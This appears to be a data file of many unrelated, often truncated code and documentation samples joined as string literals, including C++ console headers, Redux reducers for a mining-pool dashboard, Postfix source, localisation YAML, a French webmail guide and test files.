otherwise file will\n be downloaded and extracted there.\n Filename is `science.csv`.\n\n Returns:\n\n Tuple of np.ndarray `x_train` with 1385 rows and 7 columns and\n dictionary `metadata` of" +"/*++\r\nCopyright (c) Microsoft Corporation\r\nLicensed under the MIT license.\r\n\r\nModule Name:\r\n- WaitQueue.h\r\n\r\nAbstract:\r\n- This file manages a queue of wait blocks\r\n\r\nAuthor:\r\n- Michael Niksa (miniksa) 17-Oct-2016\r\n\r\nRevision History:\r\n- Adapted from original items in handle.h\r\n--*/\r\n\r\n#pragma once\r\n\r\n#include <list>\r\n\r\n#include \"..\\host\\conapi.h\"\r\n\r\n#include \"IWaitRoutine.h\"\r\n#include \"WaitBlock.h\"\r\n#include \"WaitTerminationReason.h\"\r\n\r\nclass ConsoleWaitQueue\r\n{\r\npublic:\r\n ConsoleWaitQueue();\r\n\r\n ~ConsoleWaitQueue();\r\n\r\n bool NotifyWaiters(const bool fNotifyAll);\r\n\r\n bool NotifyWaiters(const bool fNotifyAll,\r\n const WaitTerminationReason TerminationReason);\r\n\r\n [[nodiscard]] static HRESULT s_CreateWait(_Inout_ CONSOLE_API_MSG* const pWaitReplyMessage,\r\n _In_ IWaitRoutine* const pWaiter);\r\n\r\nprivate:\r\n bool _NotifyBlock(_In_ ConsoleWaitBlock* pWaitBlock,\r\n const WaitTerminationReason TerminationReason);\r\n\r\n std::list<ConsoleWaitBlock*> _blocks;\r\n\r\n friend class ConsoleWaitBlock; // Blocks live in multiple queues so we let them manage the lifetime.\r\n};" +"import preset from '../../src/tasks/preset';\nimport { Task } from '../../src/types';\nimport { wait } from '../custom/guards';\n\nconst task: Task = preset[0].tasks[0];\n\ndescribe('run single', () => {\n it('should be able to run a single task', () => {\n // Having a larger sample so there is a bit more time for the test running\n // This will give us a longer test run (at least 10 animation frames)\n // We are doing this so we can get in to assert the disabled behaviour\n cy.get('@sampleSelect').select('10 samples').should('have.value', '10');\n\n cy.get('@startAllButton').click();\n\n wait.forResults();\n\n // Task is currently closed\n cy.get('@panel')\n .contains(task.name)\n .closest('button')\n .should('match', '[aria-expanded=\"false\"]')\n .as('toggle')\n // expand the task\n .click()\n .should('match', '[aria-expanded=\"true\"]');\n\n // First run: checking that the run button is disabled\n cy.get('@panel')\n .contains('Run task')\n .as('runButton')\n .should('be.enabled')\n .click()\n .should('be.disabled');\n\n wait.forResults();\n\n // run button enabled after results\n cy.get('@runButton').should('be.enabled');\n });\n});" +"// @flow\n\nimport { combineReducers } from 'redux'\nimport type { Reducer, Action } from '../../types'\n\ntype MinerDataState = {\n historical: Array<any>,\n totalSharesSubmitted: number,\n minerShareData: Object,\n rigGpsData: Object,\n paymentData: Object,\n minerImmatureBalance: number,\n latestBlockGrinEarned: number,\n isPaymentSettingProcessing: boolean,\n minerPaymentTxSlate: string,\n isTxSlateLoading: boolean,\n payoutScript: string,\n paymentFormFeedback: null | string,\n latestMinerPayments: Array<Object>,\n totalPayoutsAmount: number,\n isAudioEnabled: boolean,\n}\n\ntype MinerHistoricalBlockAction = { type: 'MINER_DATA', data: { historical: Array<any> }} | { type: 'ACCOUNT', data: null }\n\nconst historical = (state: Array<any> = [], action: MinerHistoricalBlockAction) => {\n switch (action.type) {\n case 'MINER_DATA':\n return action.data.historical\n case 'ACCOUNT':\n if (action.data === null) {\n return []\n }\n return state\n default:\n return state\n }\n}\n\nconst rigGpsData = (state: any = { c29: [], c31: [] }, action: any) => {\n switch (action.type) {\n case 'RIG_DATA':\n return action.data.rigGpsData\n default:\n return state\n }\n}\n\nconst rigShareData = (state: any = {}, action: any) => {\n switch (action.type) {\n case 'RIG_DATA':\n return action.data.rigShareData || {}\n default:\n return state\n }\n}\n\nconst rigWorkers = (state: Array<string> = [], action: any) => {\n switch (action.type) {\n case 'RIG_DATA':\n return action.data.rigWorkers\n default:\n return state\n }\n}\n\ntype MinerTotalValidSharesAction = { type: 'MINER_TOTAL_VALID_SHARES', data: { totalSharesSubmitted: number } } | { type: 'ACCOUNT', data: null" +"/*++\n/* NAME\n/*\trewrite_clnt 3\n/* SUMMARY\n/*\taddress rewrite service client\n/* SYNOPSIS\n/*\t#include <vstring.h>\n/*\t#include <rewrite_clnt.h>\n/*\n/*\tVSTRING\t*rewrite_clnt(ruleset, address, result)\n/*\tconst char *ruleset;\n/*\tconst char *address;\n/*\n/*\tVSTRING\t*rewrite_clnt_internal(ruleset, address, result)\n/*\tconst char *ruleset;\n/*\tconst char *address;\n/*\tVSTRING\t*result;\n/* DESCRIPTION\n/*\tThis module implements a mail address rewriting client.\n/*\n/*\trewrite_clnt() sends a rule set name and external-form address to the\n/*\trewriting service and returns the resulting external-form address.\n/*\tIn case of communication failure the program keeps trying until the\n/*\tmail system shuts down.\n/*\n/*\trewrite_clnt_internal() performs the same functionality but takes\n/*\tinput in internal (unquoted) form, and produces output in internal\n/*\t(unquoted) form.\n/* DIAGNOSTICS\n/*\tWarnings: communication failure. Fatal error: mail system is down.\n/* SEE ALSO\n/*\tmail_proto(3h) low-level mail component glue.\n/* LICENSE\n/* .ad\n/* .fi\n/*\tThe Secure Mailer license must be distributed with this software.\n/* AUTHOR(S)\n/*\tWietse Venema\n/*\tIBM T.J. Watson Research\n/*\tP.O. Box 704\n/*\tYorktown Heights, NY 10598, USA\n/*--*/\n\n/* System library. */\n\n#include <sys_defs.h>\n#include <unistd.h>\n#include <errno.h>\n#include <string.h>\n\n/* Utility library. */" +"//\n// HFTextField.h\n// HexFiend_2\n//\n// Copyright 2008 ridiculous_fish. All rights reserved.\n//\n\n#import <HexFiend/HFStringEncoding.h>\n\n@class HFLayoutRepresenter, HFRepresenter, HFController, HFHexTextRepresenter, HFStringEncodingTextRepresenter;\n\n/*! @class HFTextField\n @brief A high-level view class that is analagous to NSTextField.\n \n HFTextField encapsulates a HFController and HFRepresenters into a single \"do it all\" NSControl analagous to NSTextField. Its objectValue is an HFByteArray. It sends its \\c action to its \\c target when the user hits return. It has no control.\n \n An HFTextField can be configured to show a hexadecimal view, an ASCII view, or both.\n \n This class is currently missing a fair amount of functionality, such as enabled state.\n*/\n \n@interface HFTextField : NSControl {\n HFController *dataController;\n HFLayoutRepresenter *layoutRepresenter;\n HFHexTextRepresenter *hexRepresenter;\n HFStringEncodingTextRepresenter *textRepresenter;\n IBOutlet id target;\n SEL action;\n}\n\n@property (nonatomic) BOOL usesHexArea; ///< Whether the hexadecimal view is shown.\n@property (nonatomic) BOOL usesTextArea; ///< Whether the text area is shown.\n@property (nonatomic) HFStringEncoding *stringEncoding; ///< The string encoding used by the text area.\n@property (nonatomic, getter=isEditable) BOOL editable; ///< Whether the field is editable.\n\n@end" +"# encoding: utf-8\n#\n# This file contains transliteration rules for Vietnamese\n#\n# To validate this YAML file after you change it, please paste it into\n# http://yamllint.com/\n\nvi:\n i18n:\n transliterate:\n rule:\n \u00e0: \"a\"\n \u00e1: \"a\"\n \u1ea1: \"a\"\n \u1ea3: \"a\"\n \u00e3: \"a\"\n \u00e2: \"a\"\n \u1ea7: \"a\"\n \u1ea5: \"a\"\n \u1ead: \"a\"\n \u1ea9: \"a\"\n \u1eab: \"a\"\n \u0103: \"a\"\n \u1eb1: \"a\"\n \u1eaf: \"a\"\n \u1eb7: \"a\"\n \u1eb3: \"a\"\n \u1eb5: \"a\"\n \u00e8: \"e\"\n \u00e9: \"e\"\n \u1eb9: \"e\"\n \u1ebb: \"e\"\n \u1ebd: \"e\"\n \u00ea: \"e\"\n \u1ec1: \"e\"\n \u1ebf: \"e\"\n \u1ec7: \"e\"\n \u1ec3: \"e\"\n \u1ec5: \"e\"\n \u00ec: \"i\"\n \u00ed: \"i\"\n \u1ecb: \"i\"\n \u1ec9: \"i\"\n \u0129: \"i\"\n \u00f2: \"o\"\n \u00f3: \"o\"\n \u1ecd: \"o\"\n \u1ecf: \"o\"\n \u00f5: \"o\"\n \u00f4: \"o\"\n \u1ed3: \"o\"\n \u1ed1: \"o\"\n \u1ed9: \"o\"\n \u1ed5: \"o\"\n \u1ed7: \"o\"\n \u01a1: \"o\"\n \u1edd: \"o\"\n \u1edb: \"o\"\n \u1ee3: \"o\"\n \u1edf: \"o\"\n \u1ee1: \"o\"\n \u00f9: \"u\"\n \u00fa: \"u\"\n \u1ee5: \"u\"\n \u1ee7: \"u\"\n \u0169: \"u\"\n \u01b0: \"u\"\n \u1eeb: \"u\"\n \u1ee9: \"u\"\n \u1ef1: \"u\"\n \u1eed: \"u\"\n \u1eef: \"u\"\n \u1ef3: \"y\"\n \u00fd: \"y\"\n \u1ef5: \"y\"\n \u1ef7: \"y\"\n \u1ef9: \"y\"\n \u0111: \"d\"\n \u00c0: \"A\"\n \u00c1: \"A\"\n \u1ea0: \"A\"\n \u1ea2: \"A\"\n \u00c3: \"A\"\n \u00c2: \"A\"\n \u1ea6: \"A\"\n \u1ea4: \"A\"\n \u1eac: \"A\"\n \u1ea8: \"A\"\n \u1eaa: \"A\"\n \u0102: \"A\"\n \u1eb0: \"A\"\n \u1eae: \"A\"\n \u1eb6: \"A\"\n \u1eb2: \"A\"\n \u1eb4:" +"---\ntitle: 'Utiliser son adresse e-mail depuis le webmail RoundCube'\nslug: utilisation-roundcube\nexcerpt: 'Ce guide va vous permettre de vous familiariser avec le Webmail RoundCube'\nsection: 'Premiers pas'\norder: 5\n---\n\n**Derni\u00e8re mise \u00e0 jour le 05/05/2020**\n\n## Ou et comment se connecter au Webmail RoundCube ?\n\n### Via le site OVHcloud.com\n\nRendez-vous sur le site [OVHcloud](http://www.ovh.com){.external} et cliquez sur \"Webmail\" en haut \u00e0 droite.\n\n![hosting](images/img_2413.jpg){.thumbnail}\n\n\n### Interface generale de Webmail OVHcloud\n\nVous arrivez alors sur une interface de saisie d'adresse e-mail. Cette interface permet de vous rediriger directement vers le Webmail propre \u00e0 votre service mail OVHcloud sans \u00e0 vous soucier de quoi que ce soit.\n\nSi vous connaissez d\u00e9j\u00e0 votre type d'offre mail OVHcloud, vous pouvez acc\u00e9der directement au Webmail de votre choix en bas de page en cliquant sur .\n\nEn cliquant sur , vous acc\u00e9derez directement aux guides relatifs au Webmail survol\u00e9.\n\n\n![hosting](images/img_2414.jpg){.thumbnail}\n\n\n\n> [!success]\n>\n> En cochant \"M\u00e9moriser cette adresse e-mail\", les diff\u00e9rentes adresses alors\n> saisies de la sorte seront sauvegard\u00e9es dans le menu contextuel en haut \u00e0\n> droite (Webmail en bleu). L'avantage est que vous pourrez vous connecter\n> directement \u00e0 l'adresse souhait\u00e9e tr\u00e8s facilement !\n> \n\n\n### Interface de connexion" +"---\ntitle: \"'<name>' is not a member of '<classname>'\"\nms.date: 10/10/2018\nf1_keywords: \n - \"bc30456\"\n - \"vbc30456\"\nhelpviewer_keywords: \n - \"BC30456\"\nms.assetid: 029f9742-858a-40c5-b771-7cdfb2c777cc\n---\n# '\\<name>' is not a member of '\\<classname>'\n\nThe member you have provided is not a member of the class. \n \n **Error ID:** BC30456 \n \n## To correct this error \n \n1. Check the name of the member to ensure it is accurate. \n \n2. Use an actual member of the class.\n\n3. If you are attempting to compile an SDK-style project (a project with a \\*.vbproj file that begins with the line `<Project Sdk=\"Microsoft.NET.Sdk\">`), and the error message refers to a type or member in the Microsoft.VisualBasic.dll assembly, configure your application to compile with a reference to the Visual Basic Runtime Library. By default, a subset of the library is embedded in your assembly in an SDK-style project.\n\n For example, the following example fails to compile because the <xref:Microsoft.VisualBasic.Devices.ComputerInfo.InstalledUICulture%2A?displayProperty=fullName> property cannot be found. It is not embedded in the subset of the Visual Basic Runtime included with your application. \n\n [!code-vb[BC30456](~/samples/snippets/visualbasic/language-reference/error-messages/bc30456/program.vb)]\n\n To address this error, add the `<VBRuntime>Default</VBRuntime>` element to the projects `<PropertyGroup>` section, as the following Visual Basic project file shows.\n\n [!code-vb[BC30456](~/samples/snippets/visualbasic/language-reference/error-messages/bc30456/bc30456.vbproj?highlight=6)]" +"<! DOCTYPE html>\n\n<html>\n \n <head>\n \n <!-- TODO: Add a title tag and use the title 'My Udacity Task List' -->\n \n </head>\n <body>\n <!-- TODO: Add a header tag, h1. The h1 should say \"Today's TODO list' -->\n\n <!-- TODO: Notice that the workspace folder contains the Udacity logo in a file called udacity.png. Insert the image here -->\n \n <!-- TODO: Use a link tag to link to the Udacity website https://www.udacity.com --Make sure to add text in-between the opening and closing tags.>\n \n <!-- TODO: Use a paragraph tag. Inside the paragraph tag, introduce yourself -->\n \n \t<!-- TODO: Make an unordered list containing at least three items that you plan to do this week to progress in the nanodgree. Look up the syntax for unordered lists if you're not sure how to do this. -->\n\n <!-- TODO: Get creative and add anything else youl would like to add. The W3Schools website has a wealth of information about html tags. See: https://www.w3schools.com/tags -->\n \n </body>\n \n</html>" +"package org.apereo.cas.support.saml.web.idp.profile.builders;\n\nimport org.apereo.cas.support.saml.SamlException;\nimport org.apereo.cas.support.saml.services.SamlRegisteredService;\nimport org.apereo.cas.support.saml.services.idp.metadata.SamlRegisteredServiceServiceProviderMetadataFacade;\n\nimport org.opensaml.core.xml.XMLObject;\nimport org.opensaml.messaging.context.MessageContext;\nimport org.opensaml.saml.saml2.core.RequestAbstractType;\n\nimport javax.servlet.http.HttpServletRequest;\nimport javax.servlet.http.HttpServletResponse;\n\n/**\n * The {@link SamlProfileObjectBuilder} defines the operations\n * required for building the saml response for an RP.\n *\n * @param <T> the type parameter\n * @author Misagh Moayyed\n * @since 5.0.0\n */\n@FunctionalInterface\npublic interface SamlProfileObjectBuilder<T extends XMLObject> {\n\n /**\n * Build response.\n *\n * @param authnRequest the authn request\n * @param request the request\n * @param response the response\n * @param assertion the assertion\n * @param service the service\n * @param adaptor the adaptor\n * @param binding the binding\n * @param messageContext the message context\n * @return the response\n * @throws SamlException the exception\n */\n T build(RequestAbstractType authnRequest,\n HttpServletRequest request,\n HttpServletResponse response,\n Object assertion,\n SamlRegisteredService service,\n SamlRegisteredServiceServiceProviderMetadataFacade adaptor,\n String binding,\n MessageContext messageContext) throws SamlException;\n}" +" 0\nSECTION\n 2\nHEADER\n 9\n$ACADVER\n 1\nAC1009\n 9\n$MEASUREMENT\n 70\n 1\n 0\nENDSEC\n 0\nSECTION\n 2\nENTITIES\n 0\nLWPOLYLINE\n 8\n0\n 62\n7\n 90\n5\n 70\n1\n 10\n14.271562\n 20\n2.189987\n 10\n14.271562\n 20\n1.441550\n 10\n15.568437\n 20\n1.441550\n 10\n15.568437\n 20\n2.938425\n 10\n14.271562\n 20\n2.938425\n 0\nLWPOLYLINE\n 8\n0\n 62\n7\n 90\n5\n 70\n1\n 10\n12.371562\n 20\n2.189987\n 10\n12.371562\n 20\n1.441550\n 10\n13.668437\n 20\n1.441550\n 10\n13.668437\n 20\n2.938425\n 10\n12.371562\n 20\n2.938425\n 0\nLWPOLYLINE\n 8\n0\n 62\n7\n 90\n5\n 70\n1\n 10\n14.271562\n 20\n4.729988\n 10\n14.271562\n 20\n3.981550\n 10\n15.568437\n 20\n3.981550\n 10\n15.568437\n 20\n5.478425\n 10\n14.271562\n 20\n5.478425\n 0\nLWPOLYLINE\n 8\n0\n 62\n7\n 90\n5\n 70\n1\n 10\n12.371562\n 20\n4.729988\n 10\n12.371562\n 20\n3.981550\n 10\n13.668437\n 20\n3.981550\n 10\n13.668437\n 20\n5.478425\n 10\n12.371562\n 20\n5.478425\n 0\nLWPOLYLINE\n 8\n0\n 62\n7\n 90\n5\n 70\n1\n 10\n31.788437\n 20\n9.809988\n 10\n31.788437\n 20\n10.208425\n 10\n30.441562\n 20\n10.208425\n 10\n30.441562\n 20\n9.411550\n 10\n31.788437\n 20\n9.411550\n 0\nLWPOLYLINE\n 8\n0\n 62\n7\n 90\n5\n 70\n1\n 10\n29.248437\n 20\n9.809988\n 10\n29.248437\n 20\n10.208425\n 10\n27.901563\n 20\n10.208425\n 10\n27.901563\n 20\n9.411550\n 10\n29.248437\n 20\n9.411550\n 0\nLWPOLYLINE" +"import Layout from 'components/Layout'\nimport Head from 'next/head'\nimport Link from 'next/link'\n\nfunction Home() {\n return (\n <Layout backButton={false}>\n <Head>\n <meta name=\"yandex-verification\" content=\"1089786801360409\" />\n </Head>\n <img alt=\"React Rendering Strategies\" src=\"/strategies.gif\" />\n <h1>\n <strong>React</strong> \u269b\ufe0e\u26a1\ufe0f\n <br />\n rendering strategies\n </h1>\n <nav>\n <li>\n <Link href=\"/ssr-client-rehydration\">\n <a>SSR with client rehydration</a>\n </Link>\n </li>\n <li>\n <Link href=\"/dynamic-rendering-component\">\n <a>Dynamic Rendering (component)</a>\n </Link>\n </li>\n\n <li>\n <Link href=\"/static-content\">\n <a>Static Content</a>\n </Link>\n </li>\n\n <li>\n <Link href=\"/progressive-hydration\">\n <a>Progressive Hydration</a>\n </Link>\n </li>\n </nav>\n <style jsx>{`\n img {\n width: 200px;\n }\n li {\n list-style: none;\n padding-bottom: 16px;\n }\n h1 {\n font-size: 72px;\n font-weight: 400;\n margin-top: 0;\n }\n a {\n color: #0000cd;\n font-size: 48px;\n line-height: 56px;\n position: relative;\n text-decoration: none;\n transition: all 0.3s ease;\n }\n a:hover {\n text-decoration: underline;\n }\n `}</style>\n </Layout>\n )\n}\n\nexport default Home" +"StartChar: uni0311\nEncoding: 441 785 324\nWidth: 0\nFlags: MW\nAnchorPoint: \"top_accent\" 158 570 mark 0\nLayerCount: 2\nFore\nSplineSet\n194 519 m 0\n 191 542 188 579 152 579 c 0\n 111 579 83 560 71 526 c 0\n 67 515 56 498 46 498 c 0\n 36 498 32 508 32 516 c 0\n 32 577 95 636 169 636 c 0\n 201 636 241 607 241 566 c 0\n 241 533 228 498 208 498 c 0\n 201 498 195 511 194 519 c 0\nEndSplineSet\nValidated: 1\nSubstitution2: \"Smallcaps subtable\" uni0311.sc\nSubstitution2: \"'case' Case-Sensitive Forms lookup 6 subtable\" uni0311.cap\nEndChar" +"\ufeffusing System;\n\nnamespace Swifter.Debug\n{\n public class TestClass\n {\n public int public_class_field_int;\n public string public_class_field_string;\n\n private int private_class_field_int;\n private string private_class_field_string;\n\n public int public_class_property_int { get; set; }\n public string public_class_property_string { get; set; }\n\n private int private_class_property_int { get; set; }\n private string private_class_property_string { get; set; }\n\n public static int public_static_field_int;\n public static string public_static_field_string;\n\n private static int private_static_field_int;\n private static string private_static_field_string;\n\n [ThreadStatic]\n public static int public_thread_static_field_int;\n [ThreadStatic]\n public static string public_thread_static_field_string;\n\n public static int public_static_property_int { get; set; }\n public static string public_static_property_string { get; set; }\n\n private static int private_static_property_int { get; set; }\n private static string private_static_property_string { get; set; }\n\n public event EventHandler<EventArgs> public_class_event { add { } remove { } }\n private event EventHandler<EventArgs> private_class_event { add { } remove { } }\n\n public static event EventHandler<EventArgs> public_static_event { add { } remove { } }\n private static event EventHandler<EventArgs> private_static_event { add { } remove { } }\n\n public static void public_static_action()\n {\n\n }\n\n public static void public_static_action_int(int num)\n {\n\n }\n\n public static void public_static_action_int_string(int num, string str)\n {\n\n }\n\n public static int public_static_func()\n {\n return default;\n }\n\n public static int public_static_func_int(int num)\n {\n return num;\n }\n\n public static string public_static_func_int_string(int" +"package\n{\n\timport flash.events.Event;\n\t\n\timport org.purepdf.Font;\n\timport org.purepdf.colors.*;\n\timport org.purepdf.elements.*;\n\timport org.purepdf.pdf.*;\n\timport org.purepdf.pdf.fonts.*;\n\timport org.purepdf.resources.BuiltinFonts;\n\n\tpublic class HelloChunk extends DefaultBasicExample\n\t{\n\t\tpublic function HelloChunk(d_list:Array=null)\n\t\t{\n\t\t\tsuper([\"Create a document using single chunks\",\"set underline, color and superscript attributes to the chunks\"]);\n\t\t\tFontsResourceFactory.getInstance().registerFont( BaseFont.COURIER_BOLD, new BuiltinFonts.COURIER_BOLD() );\n\t\t}\n\t\t\n\t\toverride protected function execute(event:Event=null) : void\n\t\t{\n\t\t\tsuper.execute();\n\t\t\t\n\t\t\tcreateDocument(\"Hello world chunk\");\n\t\t\tdocument.open();\n\t\t\t\n\t\t\tvar font: Font = new Font( Font.COURIER, -1, Font.BOLD );\n\t\t\tfont.color = RGBColor.BLUE;\n\t\t\t\n\t\t\tvar fox: Chunk = new Chunk(\"quick brown fox\", font);\n\t\t\tfox.setTextRise( 8 );\n\t\t\tfox.setBackground( RGBColor.RED );\n\t\t\t\n\t\t\tvar jumps: Chunk = new Chunk(\" jumps over \", font );\n\t\t\tvar dog: Chunk = new Chunk(\"the lazy dog\", font );\n\t\t\tdog.setTextRise(-8);\n\t\t\t\n\t\t\tdog.setUnderline( RGBColor.BLACK, 3, 0, -13, 0, PdfContentByte.LINE_CAP_ROUND );\n\t\t\tdocument.add(fox);\n\t\t\tdocument.add(jumps);\n\t\t\tdocument.add(dog);\n\t\t\t\n\t\t\tdocument.close();\n\t\t\tsave();\n\t\t}\n\t}\n}" +"# ebuild\n\n> A low level interface to the Gentoo Portage system.\n\n- Create or update the package manifest:\n\n`ebuild {{path/to/file.ebuild}} manifest`\n\n- Clean the temporary build directories for the build file:\n\n`ebuild {{path/to/file.ebuild}} clean`\n\n- Fetch sources if they do not exist:\n\n`ebuild {{path/to/file.ebuild}} fetch`\n\n- Extract the sources to a temporary build directory:\n\n`ebuild {{path/to/file.ebuild}} unpack`\n\n- Compile the extracted sources:\n\n`ebuild {{path/to/file.ebuild}} compile`\n\n- Install the package to a temporary install directory:\n\n`ebuild {{path/to/file.ebuild}} install`\n\n- Install the temporary files to the live filesystem:\n\n`ebuild {{path/to/file.ebuild}} qmerge`\n\n- Fetch, unpack, compile, install and qmerge the specified ebuild file:\n\n`ebuild {{path/to/file.ebuild}} merge`" +"// TODO: Remove these globals by rewriting gamedescription.js\nconst g_MapSizes = prepareForDropdown(g_Settings && g_Settings.MapSizes);\nconst g_MapTypes = prepareForDropdown(g_Settings && g_Settings.MapTypes);\nconst g_PopulationCapacities = prepareForDropdown(g_Settings && g_Settings.PopulationCapacities);\nconst g_WorldPopulationCapacities = prepareForDropdown(g_Settings && g_Settings.WorldPopulationCapacities);\nconst g_StartingResources = prepareForDropdown(g_Settings && g_Settings.StartingResources);\nconst g_VictoryConditions = g_Settings && g_Settings.VictoryConditions;\n\n/**\n * Offer users to select playable civs only.\n * Load unselectable civs as they could appear in scenario maps.\n */\nconst g_CivData = loadCivData(false, false);\n\n/**\n * Whether this is a single- or multiplayer match.\n */\nconst g_IsNetworked = Engine.HasNetClient();\n\n/**\n * Is this user in control of game settings (i.e. is a network server, or offline player).\n */\nconst g_IsController = !g_IsNetworked || Engine.HasNetServer();\n\n/**\n * Central data storing all settings relevant to the map generation and simulation.\n */\nvar g_GameAttributes = {};\n\n/**\n * Remembers which clients are assigned to which player slots and whether they are ready.\n * The keys are GUIDs or \"local\" in single-player.\n */\nvar g_PlayerAssignments = {};\n\n/**\n * This instance owns all handlers that control the two synchronized states g_GameAttributes and g_PlayerAssignments.\n */\nvar g_SetupWindow;\n\n// TODO: Remove these two global functions by specifying the JS class name in the XML of the GUI page.\n\nfunction init(initData," +"package internal_test\n\nimport (\n\t\"testing\"\n\n\t\"github.com/ThreeDotsLabs/watermill/internal\"\n\t\"github.com/stretchr/testify/assert\"\n)\n\nfunc TestIsChannelClosed(t *testing.T) {\n\tclosed := make(chan struct{})\n\tclose(closed)\n\n\twithSentValue := make(chan struct{}, 1)\n\twithSentValue <- struct{}{}\n\n\ttestCases := []struct {\n\t\tName string\n\t\tChannel chan struct{}\n\t\tExpectedPanic bool\n\t\tExpectedClosed bool\n\t}{\n\t\t{\n\t\t\tName: \"not_closed\",\n\t\t\tChannel: make(chan struct{}),\n\t\t\tExpectedPanic: false,\n\t\t\tExpectedClosed: false,\n\t\t},\n\t\t{\n\t\t\tName: \"closed\",\n\t\t\tChannel: closed,\n\t\t\tExpectedPanic: false,\n\t\t\tExpectedClosed: true,\n\t\t},\n\t\t{\n\t\t\tName: \"with_sent_value\",\n\t\t\tChannel: withSentValue,\n\t\t\tExpectedPanic: true,\n\t\t\tExpectedClosed: false,\n\t\t},\n\t}\n\n\tfor _, c := range testCases {\n\t\tt.Run(c.Name, func(t *testing.T) {\n\t\t\ttestFunc := func() {\n\t\t\t\tclosed := internal.IsChannelClosed(c.Channel)\n\t\t\t\tassert.EqualValues(t, c.ExpectedClosed, closed)\n\t\t\t}\n\n\t\t\tif c.ExpectedPanic {\n\t\t\t\tassert.Panics(t, testFunc)\n\t\t\t} else {\n\t\t\t\tassert.NotPanics(t, testFunc)\n\t\t\t}\n\t\t})\n\t}\n}" +"<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<xmsbt>\r\n\t<entry label=\"QL_UotoriMini_RecoverBay_Desc\">\r\n\t\t<text>Lurelin Village is a fishing village, but the\r\nresidents have been distressed lately. The\r\nfisherman Sebasto in particular is in a bind\r\nbecause a group of \\0\\0monsters \\0￿have built an\r\nencampment right on Aris Beach\u2014the best\r\nfishing spot for miles around.\r\n\r\nDefeat the monsters on the beach so the village\r\ncan resume its regular fishing.</text>\r\n\t</entry>\r\n\t<entry label=\"QL_UotoriMini_RecoverBay_Exterminate\">\r\n\t\t<text>You defeated all the monsters occupying the\r\nencampment on Aris Beach!\r\n\r\nGo tell Sebasto the good news.</text>\r\n\t</entry>\r\n\t<entry label=\"QL_UotoriMini_RecoverBay_Name\">\r\n\t\t<text>Take Back the Sea</text>\r\n\t</entry>\r\n\t<entry label=\"QL_UotoriMini_RecoverBay_Finish\">\r\n\t\t<text>The monsters that once occupied the\r\nencampment on Aris Beach have been\r\ndispatched, and the village's regular\r\nfishing operations have resumed.</text>\r\n\t</entry>\r\n</xmsbt>" +"# Extending the Pimcore User\n\nPimcore does not allow to extend the user directly. Instead it allows to create a relation \nbetween a user and one or more Pimcore objects. This can be used to add information to a user \nor to associate one or more objects directly with a system user. \n\nThis article presents an example where the `member` object is associated with a Pimcore user. \nThe screenshots show how this can be achieved through the Pimcore backend UI. In the bottom \nthere is also an example of how the user and member objects can be created and associated \nwith each other programmatically.\n\nRegardless of the creation method of users and objects, in the first step the member class \nhas to be defined in *Settings* > *Object* > *Classes*:\n\n![Member Class Config](../img/object-user1.png)\n\nIn this example, the class `member` has the three properties `location`, `name` and `user`. \nThe class can have an arbitrary number of properties. What is important in this context is, \nthat it has a property of the type `User`. Speaking in code this would be a \n`\\Pimcore\\Model\\DataObject\\ClassDefinition\\Data\\User`.\n\nWhen creating the first object instance of the member class, you can see the input widget \nfor the user property." +"# Angular Leaflet\n\n![](https://cdn.rawgit.com/angular-ui/ui-leaflet/master/logo.svg)\n\n## Why the [fork](https://github.com/tombatossals/angular-leaflet-directive)?\n\nWhile we are grateful for all the original work at [tombatossals/angular-leaflet-directive](https://github.com/tombatossals/angular-leaflet-directive). We need to be able to operate as an organization to respond to issues, pull-requests and other various items quicker. We need to be able to add other developers as admins easier via group permissions via github orgs. Lastly this project needs to be more credible via being a group / org.\n\n## Master Branch State\n\nPlease note the master branch is currently in a \"in-progress state\" and is not suitable for use at this point. We are trying\nbreak up the library to be more unix / plugin like. This will reduce the burden of constant changes to the core repo (this repo)\nfor each and every unforseeable plugin that leaflet has. Therefore, the new usage plugins will require developers (angular-ui or not)\nto create specific angular directives, services, factories, and etc to extend the main ui-leaflet directive. Where ui-leaflet\nwould be the main dependency.\n\nExamples:\n\n- [ui-leaflet-draw](https://github.com/angular-ui/ui-leaflet-draw) leaflet draw implemented as a directive\n- [ui-leaflet-layers](https://github.com/elesdoar/ui-leaflet-layers) Most layer directive logic outsourced to support all random layer plugins.\n\nHow to extend:\nCreate new directives, factories, and services specific to plugins. Use" +"function! youcompleteme#test#popup#CheckPopupPosition( winid, pos )\n redraw\n let actual_pos = popup_getpos( a:winid )\n let ret = 0\n if a:pos->empty()\n return assert_true( actual_pos->empty(), 'popup pos empty' )\n endif\n for c in keys( a:pos )\n if !has_key( actual_pos, c )\n let ret += 1\n call assert_report( 'popup with ID '\n \\ . string( a:winid )\n \\ . ' has no '\n \\ . c\n \\ . ' in: '\n \\ . string( actual_pos ) )\n else\n let ret += assert_equal( a:pos[ c ],\n \\ actual_pos[ c ],\n \\ c . ' in: ' . string( actual_pos ) )\n endif\n endfor\n return ret\nendfunction\n\n\nfunction! youcompleteme#test#popup#ScreenPos( winid, row, col )\n \" Returns the screen position of the row/col in win with id winid. This\n \" differs from screenpos() only in that the position need not be valid, that\n \" is there need not be a text character in the referenced cell. This is useful\n \" when finding where a popup _should_ be in screen position relative to actual\n \" text position\n \"\n \" It also probably doesn't work properly for multi-byte characters and tabs\n \" and things. And only returns the 'row' and 'col' items of the dict.\n \"\n \" So it's not that" +"#pragma once\n#include \"SQLiteNode.h\"\n\nclass SQLiteCommand {\n public:\n\n // This allows for modifying a request passed into the constructor such that we can store it as `const`.\n static SData preprocessRequest(SData&& request);\n\n // If this command was created via an escalation from a peer, this value will point to that peer object. As such,\n // this should only ever be set on leader nodes, though it does not *need* to be set on leader nodes, as they can\n // also accept connections directly from clients.\n // A value of zero is an invalid ID, and is interpreted to mean \"not set\".\n // A negative value indicates a valid ID of an invalid peer (a psuedo-peer, or a disconnected peer), that we can't\n // respond to.\n int64_t initiatingPeerID;\n\n // If this command was created via a direct client connection, this value should be set. This can be set on both\n // leader and followers, but should not be set simultaneously with `initiatingPeerID`. A command was initiated either\n // by a client, or by a peer.\n // A value of zero is an invalid ID, and is interpreted to mean \"not set\".\n // A negative value indicates a valid ID of an invalid" +"import codecs\nfrom collections import defaultdict\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport random\nfrom sklearn.decomposition import PCA\nfrom sklearn.manifold import TSNE\nimport scipy\nimport scipy.spatial.distance\nimport utils\n\n__author__ = \"Christopher Potts\"\n__version__ = \"CS224u, Stanford, Fall 2020\"\n\n\ndef euclidean(u, v):\n return scipy.spatial.distance.euclidean(u, 